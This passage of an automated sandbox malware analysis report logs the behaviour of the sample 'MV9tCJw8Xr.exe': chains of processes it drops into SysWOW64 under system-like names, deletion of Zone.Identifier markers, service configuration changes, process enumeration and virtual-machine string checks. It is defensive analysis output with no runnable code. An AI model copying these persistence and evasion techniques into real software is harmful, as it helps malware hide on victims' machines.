                      Source: unknownProcess created: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\ftp\wmvdspa.exe C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\d3dramp\mprdim.exe C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess created: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess created: C:\Windows\SysWOW64\glu32\usp10.exe C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess created: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess created: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess created: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess created: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess created: C:\Windows\SysWOW64\ftp\wmvdspa.exe C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess created: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess created: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess created: C:\Windows\SysWOW64\d3dramp\mprdim.exe C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041CCF2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004120C1 push ecx; ret
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00414599 push ecx; ret
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041080D push 59FFFF3Ah; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004120C1 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00414599 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041080D push 59FFFF3Ah; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A479A6 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A47245 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D70 push ecx; mov dword ptr [esp], 00008067h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D00 push ecx; mov dword ptr [esp], 000021B4h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D30 push ecx; mov dword ptr [esp], 00002C7Ch
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405DE0 push ecx; mov dword ptr [esp], 000025AAh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405DA0 push ecx; mov dword ptr [esp], 000036B8h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405E40 push ecx; mov dword ptr [esp], 0000AEA2h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405E70 push ecx; mov dword ptr [esp], 00008D73h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405EA0 push ecx; mov dword ptr [esp], 00007473h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405F70 push ecx; mov dword ptr [esp], 000084ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405F20 push ecx; mov dword ptr [esp], 0000E2ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405FB0 push ecx; mov dword ptr [esp], 0000460Eh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7ABE push ecx; mov dword ptr [esp], 0000E2ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7A3E push ecx; mov dword ptr [esp], 00007473h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7A0E push ecx; mov dword ptr [esp], 00008D73h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EBFE04 push C9686868h; iretd
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7B4E push ecx; mov dword ptr [esp], 0000460Eh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7B0E push ecx; mov dword ptr [esp], 000084ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB78CE push ecx; mov dword ptr [esp], 00002C7Ch
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB789E push ecx; mov dword ptr [esp], 000021B4h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC51F0 push eax; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC89CA push ecx; retf
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC8DC6 push ecx; retf
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB79DE push ecx; mov dword ptr [esp], 0000AEA2h

                      Persistence and Installation Behavior:

                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeExecutable created and started: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeExecutable created and started: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeExecutable created and started: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeExecutable created and started: C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeExecutable created and started: C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeExecutable created and started: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeExecutable created and started: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeExecutable created and started: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeExecutable created and started: C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeExecutable created and started: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeExecutable created and started: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeExecutable created and started: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeExecutable created and started: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile opened: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile opened: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile opened: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeFile opened: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeFile opened: C:\Windows\SysWOW64\glu32\usp10.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeFile opened: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeFile opened: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeFile opened: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeFile opened: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeFile opened: C:\Windows\SysWOW64\ftp\wmvdspa.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeFile opened: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeFile opened: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile opened: C:\Windows\SysWOW64\d3dramp\mprdim.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00407731 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00403DC5 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00407731 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00403DC5 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A464B7 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A41F00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6532Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe TID: 4920Thread sleep time: -480000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe TID: 4920Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe TID: 6236Thread sleep time: -300000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe TID: 6236Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe TID: 5200Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe TID: 5200Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe TID: 5236Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe TID: 5236Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\glu32\usp10.exe TID: 5292Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\glu32\usp10.exe TID: 5292Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe TID: 1592Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe TID: 1592Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe TID: 6772Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe TID: 6772Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe TID: 6028Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe TID: 6028Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe TID: 4644Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe TID: 4644Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exe TID: 6988Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exe TID: 6988Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe TID: 7008Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe TID: 7008Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe TID: 4172Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe TID: 4172Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\d3dramp\mprdim.exe TID: 1288Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A58C57 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: svchost.exe, 00000014.00000002.413010176.000002847CE88000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.413279016.000002847CEEA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information queried: ProcessInformation
